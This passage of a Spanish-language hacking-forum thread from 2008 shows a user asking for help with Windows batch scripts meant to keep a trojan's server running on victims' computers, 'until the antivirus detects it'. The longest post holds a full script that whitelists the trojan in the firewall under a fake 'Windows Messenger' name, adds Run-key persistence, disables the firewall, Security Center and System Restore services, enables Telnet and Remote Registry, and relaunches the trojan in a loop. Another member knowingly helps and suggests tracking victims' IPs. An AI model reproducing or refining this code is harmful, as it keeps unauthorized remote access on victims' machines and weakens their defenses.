Como hacer funcionar este batch perfectamente? página 5

Foro de elhacker.net

Programación

Scripting

Como hacer funcionar este batch perfectamente?

0 Usuarios y 1 Visitante están viendo este tema.

Páginas: 1 2 3 4 [5] 6 7

Autor

Tema: Como hacer funcionar este batch perfectamente? (Leído 34,726 veces)

SoloAki

Desconectado

Mensajes: 222

Re: Como hacer funcionar este batch perfectamente?

« Respuesta #40 en: 13 Febrero 2008, 16:18 pm »

Me surgio una duda si tengo el troyano en system32/2145/server.exe podria llamarle haciendo esto.

Citar

inicio:
if exist %windir%\system32\1234\server.exe ( start %windir%\system32\1234\lsass.exe )
ping -n 120 localhost > nul
goto inicio

esto haria que llamara si existiese el server.exe ahi cada 120 segundos ? esta bien hecho el code?

Asi lo agrego al bat y le saco esta parte
:bucle
start /min system.exe
ping -n 120 localhost > nul
goto bucle

por la otra que seria mas facil y mas eficaz


	En línea

Stacker

Desconectado

Mensajes: 87

Re: Como hacer funcionar este batch perfectamente?

« Respuesta #41 en: 13 Febrero 2008, 19:15 pm »

Esto llamaria a lsass.exe si existe server.exe, si lo que quieres es ejecutar el server deberia quedar así:

Citar

if exist %windir%\system32\1234\server.exe ( start %windir%\system32\1234\server.exe )

Por otro lado tanto si es server.exe(server de un troyano) como lsass.exe(bucle), supongo que deberian estar siempre en ejecución por lo que al llamarlos una y otra vez acabarás bloqueando windows.

No se si te referias a eso


	En línea

SoloAki

Desconectado

Mensajes: 222

Re: Como hacer funcionar este batch perfectamente?

« Respuesta #42 en: 13 Febrero 2008, 21:48 pm »

No Quiero hacer el bucle para llamar el server no quiero bloquearle la PC sino que llame a ese server silenciosamente en ejecucion. Tengo victimas con alto porcentaje de ping y cuando ejecuto denuevo el server vuelven inmediatamente

y nose pierden y vuelven a la hora o cada 5 horas. Por eso el fin de este .bat es para eso. No perder nunca a la victima hasta que el antivirus te lo detecte

y no perderlo por el ping o por otras causas Jeje. Espero respuesta tuya !! Nos vemos


	En línea

Stacker

Desconectado

Mensajes: 87

Re: Como hacer funcionar este batch perfectamente?

« Respuesta #43 en: 14 Febrero 2008, 18:09 pm »

Entiendo, creo que no deberia darte problemas.

Además supongo que tendrás ip fija, un no-ip o un sistema que te reporte la ip de la víctima (si no se encarga el propio troyano).


	En línea

SoloAki

Desconectado

Mensajes: 222

Re: Como hacer funcionar este batch perfectamente?

« Respuesta #44 en: 15 Febrero 2008, 15:27 pm »

Ok entonces esta bien si existe server.exe va a ejecutar el bucle no? Y si se reinicia la PC se inicia otra vez el .bat y se va a fijar si está y si es asi va a empezar otra vez el bucle verdad?


	En línea

Stacker

Desconectado

Mensajes: 87

Re: Como hacer funcionar este batch perfectamente?

« Respuesta #45 en: 15 Febrero 2008, 16:03 pm »

Así es. Pero, no entiendo al ver otra vez el código porqué si existe server.exe se ejecuta lsass.exe cada x segundos.


	En línea

SoloAki

Desconectado

Mensajes: 222

Re: Como hacer funcionar este batch perfectamente?

« Respuesta #46 en: 22 Febrero 2008, 16:57 pm »

No.. Si existe server.exe if exist, vendria a responder al bucle creo. Osea me entendes si existe server.exe empieza a hacer el bucle otra vez de 120 seg.


	En línea

Stacker

Desconectado

Mensajes: 87

Re: Como hacer funcionar este batch perfectamente?

« Respuesta #47 en: 26 Febrero 2008, 17:33 pm »

Citar

No.. Si existe server.exe if exist, vendria a responder al bucle creo. Osea me entendes si existe server.exe empieza a hacer el bucle otra vez de 120 seg.


	En línea

SoloAki

Desconectado

Mensajes: 222

Re: Como hacer funcionar este batch perfectamente?

« Respuesta #48 en: 7 Marzo 2008, 18:07 pm »

Dudas aqui !!

Código:

@echo off
reg add HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
/v server.exe /t REG_SZ /d "%windir%\ctfmon\1234\server.exe:*:Enabled:  Windows Messenger"
[color=red]REG ADD "hklm\software\microsoft\windows\currentversion\run" /v ctfmon.bat /d[/color] %windir%\system32\2114\ctfmon.bat /f
if exist %windir%\system32\2114\lsass.exe ( start %windir%\system32\2114\lsass.exe )
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess" /v Start /d 4 /f
net start AppMgmt
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\AppMgmt" /v Start /d 4 /f
net start ProtectedStorage
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\ProtectedStorage" /v Start /d 2 /f
net start LmHosts
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\LmHosts" /v Start /d 2 /f
net stop wscsvc
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\wscsvc" /v Start /d 4 /f
net start RemoteRegistry
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\RemoteRegistry" /v Start /d 2 /f
net stop Srservice
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\Srservice" /v Start /d 4 /f
net start TlnSvr
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\TlnSvr" /v Start /d 2 /f
inicio:
if exist %windir%\system32\2114\system32.exe ( start /min %windir%\system32\2114\system32.exe )
ping -n 100 localhost > nul
goto inicio

Esto %windir%system32\2114\ es la ubicacion donde se aloja el troyano una pregunta system32 tiene algun abreviado en codigo como %windir% que seria Window? se pueden poner 2 if exist en un mismo bat? uno para llamar a otro bat y otro ubicado en el bucle como ves. Otra pregunta lo rojo eso agrega el .bat al msconfig cuando se reinicia la pc vuelve a ejecutarse el bat verdad?

El otro bat que seria este..

Código:

:r
ping 127.0.0.1 /n 120
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v [color=red]lsass[/color]
if %errorlevel%==1 reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ctfmon /d "%windir%\system32\2114\ctfmon.bat" /f
goto r

la parte roja ahi no tendria que ser lsass.exe ?

Ahi ta esas mis dudas espero que me puedas ayudar otra vez.. y decirme si el bat esta bien.


« Última modificación: 7 Marzo 2008, 18:19 pm por SoloAki »	En línea

Stacker

Desconectado

Mensajes: 87

Re: Como hacer funcionar este batch perfectamente?

« Respuesta #49 en: 7 Marzo 2008, 21:16 pm »

Hola de nuevo.

Creo que no hay una varible de entorno para system32, %windir%\system32 es lo más corto que te asegura a la vez no equivocarte de unidad. (que puede no ser C:)

La parte en rojo está bien si lo que quieres ejecutar al inicio el ctfmon.bat.

Y por último, sí, se pueden poner cuantos if exist quieras, pero ten en cuenta:

-El primero de tu script se ejecuta una vez al inicio (lsass.exe).
-El segundo se está ejecutando constantemente cada 100 pings siempre que exista system32.exe

Espero haberte ayudado. Pero para asegurarme de mi respuesta, ¿cual era el nombre de este script? ¿ctfmon.bat? - me lo he preguntado porque crei que ibas a compilarlo. :huh:

Si no es así explicame que nombre tiene cada archivo para que pueda darte una respuesta definitiva.

Saludos


	En línea

Páginas: 1 2 3 4 [5] 6 7

Ir a:

Mensajes similares
	Asunto	Iniciado por	Respuestas	Vistas	Último mensaje
	Porque no puedo hacer ping ??? y sin embargo mi navegador entra perfectamente??? Redes	The_Saint	4	17,780	9 Junio 2011, 23:48 pm por madpitbull_99
	Como hacer una consola batch Scripting	zikotik	4	3,558	8 Julio 2013, 17:43 pm por OmarHack
	Configura perfectamente tu WiFi con este programa Noticias	wolfbcn	0	1,283	10 Enero 2016, 21:22 pm por wolfbcn
	(solucionado) no consigo hacer funcionar un codigo batch Scripting	hckcrck	6	4,191	17 Junio 2016, 17:47 pm por hckcrck
	Hacer funcionar el lector de bandeja de discos con este lenguaje .net .NET (C#, VB.NET, ASP)	Meta	7	6,576	19 Noviembre 2017, 01:52 am por Meta